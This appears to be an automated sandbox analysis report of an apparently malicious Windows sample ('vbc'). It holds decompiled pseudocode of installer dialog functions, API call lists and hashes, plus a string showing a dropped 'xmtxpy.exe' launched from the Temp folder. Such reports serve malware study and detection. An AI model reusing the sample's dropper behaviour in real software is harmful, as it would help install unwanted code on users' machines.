                          							ShowWindow( *0x423ea8, 8);
                          							__eflags =  *0x423f2c - _t149; // 0x0
                          							if(__eflags == 0) {
                          								_t112 =  *0x41fc68; // 0x0
                          								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
                          							}
                          							E00403E10(1);
                          							goto L25;
                          						}
                          						 *0x41f860 = 2;
                          						E00403E10(0x78);
                          						goto L20;
                          					} else {
                          						__eflags = _a12 - 0x403;
                          						if(_a12 != 0x403) {
                          							L20:
                          							return E00403E9E(_a8, _a12, _a16);
                          						}
                          						ShowWindow( *0x423670, _t149);
                          						ShowWindow(_t154, 8);
                          						E00403E6C(_t154);
                          						goto L17;
                          					}
                          				}
                          				_v52 = _v52 | 0xffffffff;
                          				_v40 = _v40 | 0xffffffff;
                          				_v60 = 2;
                          				_v56 = 0;
                          				_v48 = 0;
                          				_v44 = 0;
                          				asm("stosd");
                          				asm("stosd");
                          				_t123 =  *0x423eb0; // 0x8c0fa0
                          				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                          				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                          				 *0x423670 = GetDlgItem(_a4, 0x403);
                          				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                          				_t127 = GetDlgItem(_a4, 0x3f8);
                          				 *0x423684 = _t127;
                          				_v8 = _t127;
                          				E00403E6C( *0x423670);
                          				 *0x423674 = E004046C5(4);
                          				 *0x42368c = 0;
                          				GetClientRect(_v8,  &_v28);
                          				_v52 = _v28.right - GetSystemMetrics(0x15);
                          				SendMessageA(_v8, 0x101b, 0,  &_v60);
                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                          				if(_a8 >= 0) {
                          					SendMessageA(_v8, 0x1001, 0, _a8);
                          					SendMessageA(_v8, 0x1026, 0, _a8);
                          				}
                          				if(_a12 >= _t149) {
                          					SendMessageA(_v8, 0x1024, _t149, _a12);
                          				}
                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                          				_push(0x1b);
                          				E00403E37(_a4);
                          				if(( *0x423eb8 & 0x00000003) != 0) {
                          					ShowWindow( *0x423670, _t149);
                          					if(( *0x423eb8 & 0x00000002) != 0) {
                          						 *0x423670 = _t149;
                          					} else {
                          						ShowWindow(_v8, 8);
                          					}
                          					E00403E6C( *0x423668);
                          				}
                          				_t158 = GetDlgItem(_a4, 0x3ec);
                          				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                          				if(( *0x423eb8 & 0x00000004) != 0) {
                          					SendMessageA(_t158, 0x409, _t149, _a12);
                          					SendMessageA(_t158, 0x2001, _t149, _a8);
                          				}
                          				goto L37;
                          			}




































                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 00404FC0
                          • GetDlgItem.USER32(?,000003EE), ref: 00404FCF
                          • GetClientRect.USER32 ref: 0040500C
                          • GetSystemMetrics.USER32 ref: 00405014
                          • SendMessageA.USER32 ref: 00405035
                          • SendMessageA.USER32 ref: 00405046
                          • SendMessageA.USER32 ref: 00405059
                          • SendMessageA.USER32 ref: 00405067
                          • SendMessageA.USER32 ref: 0040507A
                          • ShowWindow.USER32(00000000,?), ref: 0040509C
                          • ShowWindow.USER32(?,00000008), ref: 004050B0
                          • GetDlgItem.USER32(?,000003EC), ref: 004050D1
                          • SendMessageA.USER32 ref: 004050E1
                          • SendMessageA.USER32 ref: 004050FA
                          • SendMessageA.USER32 ref: 00405106
                          • GetDlgItem.USER32(?,000003F8), ref: 00404FDE
                            • Part of subcall function 00403E6C: SendMessageA.USER32 ref: 00403E7A
                          • GetDlgItem.USER32(?,000003EC), ref: 00405123
                          • CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
                          • CloseHandle.KERNEL32(00000000), ref: 00405138
                          • ShowWindow.USER32(00000000), ref: 0040515C
                          • ShowWindow.USER32(00000000,00000008), ref: 00405161
                          • ShowWindow.USER32(00000008), ref: 004051A8
                          • SendMessageA.USER32 ref: 004051DA
                          • CreatePopupMenu.USER32 ref: 004051EB
                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405200
                          • GetWindowRect.USER32 ref: 00405213
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                          • SendMessageA.USER32 ref: 00405272
                          • OpenClipboard.USER32(00000000), ref: 00405282
                          • EmptyClipboard.USER32 ref: 00405288
                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                          • GlobalLock.KERNEL32 ref: 0040529B
                          • SendMessageA.USER32 ref: 004052AF
                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                          • SetClipboardData.USER32 ref: 004052D2
                          • CloseClipboard.USER32 ref: 004052D8
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: {
                          • API String ID: 590372296-366298937
                          • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                          • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                          • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                          • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                          				struct HWND__* _v8;
                          				struct HWND__* _v12;
                          				signed int _v16;
                          				intOrPtr _v20;
                          				void* _v24;
                          				long _v28;
                          				int _v32;
                          				signed int _v40;
                          				int _v44;
                          				signed int* _v56;
                          				intOrPtr _v60;
                          				signed int _v64;
                          				long _v68;
                          				void* _v72;
                          				intOrPtr _v76;
                          				intOrPtr _v80;
                          				void* _v84;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				struct HWND__* _t182;
                          				intOrPtr _t183;
                          				int _t189;
                          				int _t196;
                          				intOrPtr _t198;
                          				long _t202;
                          				signed int _t206;
                          				signed int _t217;
                          				void* _t220;
                          				void* _t221;
                          				int _t227;
                          				intOrPtr _t231;
                          				signed int _t232;
                          				signed int _t233;
                          				signed int _t240;
                          				signed int _t242;
                          				signed int _t245;
                          				signed int _t247;
                          				struct HBITMAP__* _t250;
                          				void* _t252;
                          				char* _t268;
                          				signed char _t269;
                          				long _t274;
                          				int _t280;
                          				signed int* _t281;
                          				int _t282;
                          				long _t283;
                          				signed int* _t284;
                          				int _t285;
                          				long _t286;
                          				signed int _t287;
                          				long _t288;
                          				signed int _t291;
                          				int _t294;
                          				signed int _t298;
                          				signed int _t300;
                          				signed int _t302;
                          				intOrPtr _t309;
                          				int* _t310;
                          				void* _t311;
                          				int _t315;
                          				int _t316;
                          				int _t317;
                          				signed int _t318;
                          				void* _t320;
                          				void* _t328;
                          				void* _t331;
                          
                          				_v12 = GetDlgItem(_a4, 0x3f9);
                          				_t182 = GetDlgItem(_a4, 0x408);
                          				_t280 =  *0x423ec8; // 0x8c114c
                          				_t320 = SendMessageA;
                          				_v8 = _t182;
                          				_t183 =  *0x423eb0; // 0x8c0fa0
                          				_t315 = 0;
                          				_v32 = _t280;
                          				_v20 = _t183 + 0x94;
                          				if(_a8 != 0x110) {
                          					L23:
                          					__eflags = _a8 - 0x405;
                          					if(_a8 != 0x405) {
                          						_t289 = _a16;
                          					} else {
                          						_a12 = _t315;
                          						_t289 = 1;
                          						_a8 = 0x40f;
                          						_a16 = 1;
                          					}
                          					__eflags = _a8 - 0x4e;
                          					if(_a8 == 0x4e) {
                          						L28:
                          						__eflags = _a8 - 0x413;
                          						_v16 = _t289;
                          						if(_a8 == 0x413) {
                          							L30:
                          							__eflags =  *0x423eb9 & 0x00000002;
                          							if(( *0x423eb9 & 0x00000002) != 0) {
                          								L41:
                          								__eflags = _v16 - _t315;
                          								if(_v16 != _t315) {
                          									_t232 = _v16;
                          									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                          									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                          										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                          									}
                          									_t233 = _v16;
                          									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                          									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                          										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                          										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                          											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                          											 *_t284 =  *_t284 & 0xffffffdf;
                          											__eflags =  *_t284;
                          										} else {
                          											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                          										}
                          									}
                          								}
                          								goto L48;
                          							}
                          							__eflags = _a8 - 0x413;
                          							if(_a8 == 0x413) {
                          								L33:
                          								__eflags = _a8 - 0x413;
                          								_t289 = 0 | _a8 != 0x00000413;
                          								_t240 = E004046F2(_v8, _a8 != 0x413);
                          								__eflags = _t240 - _t315;
                          								if(_t240 >= _t315) {
                          									_t93 = _t280 + 8; // 0x8
                          									_t310 = _t240 * 0x418 + _t93;
                          									_t289 =  *_t310;
                          									__eflags = _t289 & 0x00000010;
                          									if((_t289 & 0x00000010) == 0) {
                          										__eflags = _t289 & 0x00000040;
                          										if((_t289 & 0x00000040) == 0) {
                          											_t298 = _t289 ^ 0x00000001;
                          											__eflags = _t298;
                          										} else {
                          											_t300 = _t289 ^ 0x00000080;
                          											__eflags = _t300;
                          											if(_t300 >= 0) {
                          												_t298 = _t300 & 0xfffffffe;
                          											} else {
                          												_t298 = _t300 | 0x00000001;
                          											}
                          										}
                          										 *_t310 = _t298;
                          										E0040117D(_t240);
                          										_t242 =  *0x423eb8; // 0x80
                          										_t289 = 1;
                          										_a8 = 0x40f;
                          										_t245 =  !_t242 >> 0x00000008 & 1;
                          										__eflags = _t245;
                          										_a12 = 1;
                          										_a16 = _t245;
                          									}
                          								}
                          								goto L41;
                          							}
                          							_t289 = _a16;
                          							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                          							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                          								goto L41;
                          							}
                          							goto L33;
                          						}
                          						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                          						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                          							goto L48;
                          						}
                          						goto L30;
                          					} else {
                          						__eflags = _a8 - 0x413;
                          						if(_a8 != 0x413) {
                          							L48:
                          							__eflags = _a8 - 0x111;
                          							if(_a8 != 0x111) {
                          								L56:
                          								__eflags = _a8 - 0x200;
                          								if(_a8 == 0x200) {
                          									SendMessageA(_v8, 0x200, _t315, _t315);
                          								}
                          								__eflags = _a8 - 0x40b;
                          								if(_a8 == 0x40b) {
                          									_t220 =  *0x420474;
                          									__eflags = _t220 - _t315;
                          									if(_t220 != _t315) {
                          										ImageList_Destroy(_t220);
                          									}
                          									_t221 =  *0x42048c;
                          									__eflags = _t221 - _t315;
                          									if(_t221 != _t315) {
                          										GlobalFree(_t221);
                          									}
                          									 *0x420474 = _t315;
                          									 *0x42048c = _t315;
                          									 *0x423f00 = _t315;
                          								}
                          								__eflags = _a8 - 0x40f;
                          								if(_a8 != 0x40f) {
                          									L86:
                          									__eflags = _a8 - 0x420;
                          									if(_a8 == 0x420) {
                          										__eflags =  *0x423eb9 & 0x00000001;
                          										if(( *0x423eb9 & 0x00000001) != 0) {
                          											__eflags = _a16 - 0x20;
                          											_t189 = (0 | _a16 == 0x00000020) << 3;
                          											__eflags = _t189;
                          											_t316 = _t189;
                          											ShowWindow(_v8, _t316);
                          											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                          										}
                          									}
                          									goto L89;
                          								} else {
                          									E004011EF(_t289, _t315, _t315);
                          									__eflags = _a12 - _t315;
                          									if(_a12 != _t315) {
                          										E0040140B(8);
                          									}
                          									__eflags = _a16 - _t315;
                          									if(_a16 == _t315) {
                          										L73:
                          										E004011EF(_t289, _t315, _t315);
                          										__eflags =  *0x423ecc - _t315; // 0x1
                          										_v32 =  *0x42048c;
                          										_t196 =  *0x423ec8; // 0x8c114c
                          										_v60 = 0xf030;
                          										_v16 = _t315;
                          										if(__eflags <= 0) {
                          											L84:
                          											InvalidateRect(_v8, _t315, 1);
                          											_t198 =  *0x42367c; // 0x8c223a
                          											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                          											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                          												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
                          											}
                          											goto L86;
                          										} else {
                          											_t142 = _t196 + 8; // 0x8c1154
                          											_t281 = _t142;
                          											do {
                          												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                          												__eflags = _t202 - _t315;
                          												if(_t202 != _t315) {
                          													_t291 =  *_t281;
                          													_v68 = _t202;
                          													__eflags = _t291 & 0x00000001;
                          													_v72 = 8;
                          													if((_t291 & 0x00000001) != 0) {
                          														_t151 =  &(_t281[4]); // 0x8c1164
                          														_v72 = 9;
                          														_v56 = _t151;
                          														_t154 =  &(_t281[0]);
                          														 *_t154 = _t281[0] & 0x000000fe;
                          														__eflags =  *_t154;
                          													}
                          													__eflags = _t291 & 0x00000040;
                          													if((_t291 & 0x00000040) == 0) {
                          														_t206 = (_t291 & 0x00000001) + 1;
                          														__eflags = _t291 & 0x00000010;
                          														if((_t291 & 0x00000010) != 0) {
                          															_t206 = _t206 + 3;
                          															__eflags = _t206;
                          														}
                          													} else {
                          														_t206 = 3;
                          													}
                          													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                          													__eflags = _t294;
                          													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                          													SendMessageA(_v8, 0x1102, _t294, _v68);
                          													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                          												}
                          												_v16 = _v16 + 1;
                          												_t281 =  &(_t281[0x106]);
                          												__eflags = _v16 -  *0x423ecc; // 0x1
                          											} while (__eflags < 0);
                          											goto L84;
                          										}
                          									} else {
                          										_t282 = E004012E2( *0x42048c);
                          										E00401299(_t282);
                          										_t217 = 0;
                          										_t289 = 0;
                          										__eflags = _t282 - _t315;
                          										if(_t282 <= _t315) {
                          											L72:
                          											SendMessageA(_v12, 0x14e, _t289, _t315);
                          											_a16 = _t282;
                          											_a8 = 0x420;
                          											goto L73;
                          										} else {
                          											goto L69;
                          										}
                          										do {
                          											L69:
                          											_t309 = _v20;
                          											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                          											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                          												_t289 = _t289 + 1;
                          												__eflags = _t289;
                          											}
                          											_t217 = _t217 + 1;
                          											__eflags = _t217 - _t282;
                          										} while (_t217 < _t282);
                          										goto L72;
                          									}
                          								}
                          							}
                          							__eflags = _a12 - 0x3f9;
                          							if(_a12 != 0x3f9) {
                          								goto L89;
                          							}
                          							__eflags = _a12 >> 0x10 - 1;
                          							if(_a12 >> 0x10 != 1) {
                          								goto L89;
                          							}
                          							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                          							__eflags = _t227 - 0xffffffff;
                          							if(_t227 == 0xffffffff) {
                          								goto L89;
                          							}
                          							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                          							__eflags = _t283 - 0xffffffff;
                          							if(_t283 == 0xffffffff) {
                          								L54:
                          								_t283 = 0x20;
                          								L55:
                          								E00401299(_t283);
                          								SendMessageA(_a4, 0x420, _t315, _t283);
                          								_a12 = 1;
                          								_a16 = _t315;
                          								_a8 = 0x40f;
                          								goto L56;
                          							}
                          							_t231 = _v20;
                          							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                          							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                          								goto L55;
                          							}
                          							goto L54;
                          						}
                          						goto L28;
                          					}
                          				} else {
                          					 *0x423f00 = _a4;
                          					_t247 =  *0x423ecc; // 0x1
                          					_t285 = 2;
                          					_v28 = 0;
                          					_v16 = _t285;
                          					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
                          					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                          					 *0x420480 =  *0x420480 | 0xffffffff;
                          					_v24 = _t250;
                          					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
                          					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                          					 *0x420474 = _t252;
                          					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                          					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
                          					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                          						SendMessageA(_v8, 0x111b, 0x10, 0);
                          					}
                          					DeleteObject(_v24);
                          					_t286 = 0;
                          					do {
                          						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                          						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                          							if(_t286 != 0x20) {
                          								_v16 = _t315;
                          							}
                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
                          						}
                          						_t286 = _t286 + 1;
                          					} while (_t286 < 0x21);
                          					_t317 = _a16;
                          					_t287 = _v16;
                          					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                          					_push(0x15);
                          					E00403E37(_a4);
                          					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                          					_push(0x16);
                          					E00403E37(_a4);
                          					_t318 = 0;
                          					_t288 = 0;
                          					_t328 =  *0x423ecc - _t318; // 0x1
                          					if(_t328 <= 0) {
                          						L19:
                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                          						goto L20;
                          					} else {
                          						_t311 = _v32 + 8;
                          						_v24 = _t311;
                          						do {
                          							_t268 = _t311 + 0x10;
                          							if( *_t268 != 0) {
                          								_v60 = _t268;
                          								_t269 =  *_t311;
                          								_t302 = 0x20;
                          								_v84 = _t288;
                          								_v80 = 0xffff0002;
                          								_v76 = 0xd;
                          								_v64 = _t302;
                          								_v40 = _t318;
                          								_v68 = _t269 & _t302;
                          								if((_t269 & 0x00000002) == 0) {
                          									__eflags = _t269 & 0x00000004;
                          									if((_t269 & 0x00000004) == 0) {
                          										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                          									} else {
                          										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                          									}
                          								} else {
                          									_v76 = 0x4d;
                          									_v44 = 1;
                          									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                          									_v28 = 1;
                          									 *( *0x42048c + _t318 * 4) = _t274;
                          									_t288 =  *( *0x42048c + _t318 * 4);
                          								}
                          							}
                          							_t318 = _t318 + 1;
                          							_t311 = _v24 + 0x418;
                          							_t331 = _t318 -  *0x423ecc; // 0x1
                          							_v24 = _t311;
                          						} while (_t331 < 0);
                          						if(_v28 != 0) {
                          							L20:
                          							if(_v16 != 0) {
                          								E00403E6C(_v8);
                          								_t280 = _v32;
                          								_t315 = 0;
                          								__eflags = 0;
                          								goto L23;
                          							} else {
                          								ShowWindow(_v12, 5);
                          								E00403E6C(_v12);
                          								L89:
                          								return E00403E9E(_a8, _a12, _a16);
                          							}
                          						}
                          						goto L19;
                          					}
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 1638840714-813528018
                          • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                          • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                          • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                          • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                          				signed int _v8;
                          				struct HWND__* _v12;
                          				long _v16;
                          				long _v20;
                          				char _v24;
                          				long _v28;
                          				char _v32;
                          				intOrPtr _v36;
                          				long _v40;
                          				signed int _v44;
                          				CHAR* _v52;
                          				intOrPtr _v56;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				CHAR* _v68;
                          				void _v72;
                          				char _v76;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t81;
                          				long _t86;
                          				signed char* _t88;
                          				void* _t94;
                          				signed int _t95;
                          				signed short _t113;
                          				signed int _t117;
                          				char* _t122;
                          				intOrPtr _t124;
                          				intOrPtr* _t138;
                          				signed int* _t145;
                          				intOrPtr _t147;
                          				signed int _t148;
                          				signed int _t153;
                          				struct HWND__* _t159;
                          				CHAR* _t162;
                          				int _t163;
                          
                          				_t81 =  *0x41fc68; // 0x0
                          				_v36 = _t81;
                          				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                          				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                          				if(_a8 == 0x40b) {
                          					E0040532A(0x3fb, _t162);
                          					E00405CE3(_t162);
                          				}
                          				if(_a8 != 0x110) {
                          					L8:
                          					if(_a8 != 0x111) {
                          						L20:
                          						if(_a8 == 0x40f) {
                          							L22:
                          							_v8 = _v8 & 0x00000000;
                          							_v12 = _v12 & 0x00000000;
                          							E0040532A(0x3fb, _t162);
                          							if(E00405659(_t180, _t162) == 0) {
                          								_v8 = 1;
                          							}
                          							E00405A85(0x41f460, _t162);
                          							_t145 = 0;
                          							_t86 = E00405DA3(0);
                          							_v16 = _t86;
                          							if(_t86 == 0) {
                          								L31:
                          								E00405A85(0x41f460, _t162);
                          								_t88 = E0040560C(0x41f460);
                          								if(_t88 != _t145) {
                          									 *_t88 =  *_t88 & 0x00000000;
                          								}
                          								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                          									_t153 = _a8;
                          									goto L37;
                          								} else {
                          									_t163 = 0x400;
                          									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                          									_v12 = 1;
                          									goto L38;
                          								}
                          							} else {
                          								if(0 == 0x41f460) {
                          									L30:
                          									_t145 = 0;
                          									goto L31;
                          								} else {
                          									goto L26;
                          								}
                          								while(1) {
                          									L26:
                          									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
                          									if(_t113 != 0) {
                          										break;
                          									}
                          									if(_t145 != 0) {
                          										 *_t145 =  *_t145 & _t113;
                          									}
                          									_t145 = E004055BF(0x41f460) - 1;
                          									 *_t145 = 0x5c;
                          									if(_t145 != 0x41f460) {
                          										continue;
                          									} else {
                          										goto L30;
                          									}
                          								}
                          								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                          								_v12 = 1;
                          								_t145 = 0;
                          								L37:
                          								_t163 = 0x400;
                          								L38:
                          								_t94 = E004046C5(5);
                          								if(_v12 != _t145 && _t153 < _t94) {
                          									_v8 = 2;
                          								}
                          								_t147 =  *0x42367c; // 0x8c223a
                          								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                          									E00404610(0x3ff, 0xfffffffb, _t94);
                          									if(_v12 == _t145) {
                          										SetDlgItemTextA(_a4, _t163, 0x41f450);
                          									} else {
                          										E00404610(_t163, 0xfffffffc, _t153);
                          									}
                          								}
                          								_t95 = _v8;
                          								 *0x423f44 = _t95;
                          								if(_t95 == _t145) {
                          									_v8 = E0040140B(7);
                          								}
                          								if(( *(_v36 + 0x14) & _t163) != 0) {
                          									_v8 = _t145;
                          								}
                          								E00403E59(0 | _v8 == _t145);
                          								if(_v8 == _t145 &&  *0x420484 == _t145) {
                          									E0040420A();
                          								}
                          								 *0x420484 = _t145;
                          								goto L53;
                          							}
                          						}
                          						_t180 = _a8 - 0x405;
                          						if(_a8 != 0x405) {
                          							goto L53;
                          						}
                          						goto L22;
                          					}
                          					_t117 = _a12 & 0x0000ffff;
                          					if(_t117 != 0x3fb) {
                          						L12:
                          						if(_t117 == 0x3e9) {
                          							_t148 = 7;
                          							memset( &_v72, 0, _t148 << 2);
                          							_v76 = _a4;
                          							_v68 = 0x420498;
                          							_v56 = E004045AA;
                          							_v52 = _t162;
                          							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
                          							_t122 =  &_v76;
                          							_v60 = 0x41;
                          							__imp__SHBrowseForFolderA(_t122);
                          							if(_t122 == 0) {
                          								_a8 = 0x40f;
                          							} else {
                          								__imp__CoTaskMemFree(_t122);
                          								E00405578(_t162);
                          								_t124 =  *0x423eb0; // 0x8c0fa0
                          								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                          								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
                          									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
                          									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
                          										lstrcatA(_t162, 0x422e40);
                          									}
                          								}
                          								 *0x420484 =  &(( *0x420484)[0]);
                          								SetDlgItemTextA(_a4, 0x3fb, _t162);
                          							}
                          						}
                          						goto L20;
                          					}
                          					if(_a12 >> 0x10 != 0x300) {
                          						goto L53;
                          					}
                          					_a8 = 0x40f;
                          					goto L12;
                          				} else {
                          					_t159 = _a4;
                          					_v12 = GetDlgItem(_t159, 0x3fb);
                          					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
                          						E00405578(_t162);
                          					}
                          					 *0x423678 = _t159;
                          					SetWindowTextA(_v12, _t162);
                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                          					_push(1);
                          					E00403E37(_t159);
                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                          					_push(0x14);
                          					E00403E37(_t159);
                          					E00403E6C(_v12);
                          					_t138 = E00405DA3(7);
                          					if(_t138 == 0) {
                          						L53:
                          						return E00403E9E(_a8, _a12, _a16);
                          					}
                          					 *_t138(_v12, 1);
                          					goto L8;
                          				}
                          			}

                          APIs
                          • GetDlgItem.USER32(?,000003FB), ref: 004042C1
                          • SetWindowTextA.USER32(?,?), ref: 004042EE
                          • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                          • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00420498,00000000,?,?), ref: 004043E0
                          • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd), ref: 004043EC
                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004043FC
                            • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D3B
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D48
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D4D
                            • Part of subcall function 00405CE3: CharPrevA.USER32(?,?), ref: 00405D5D
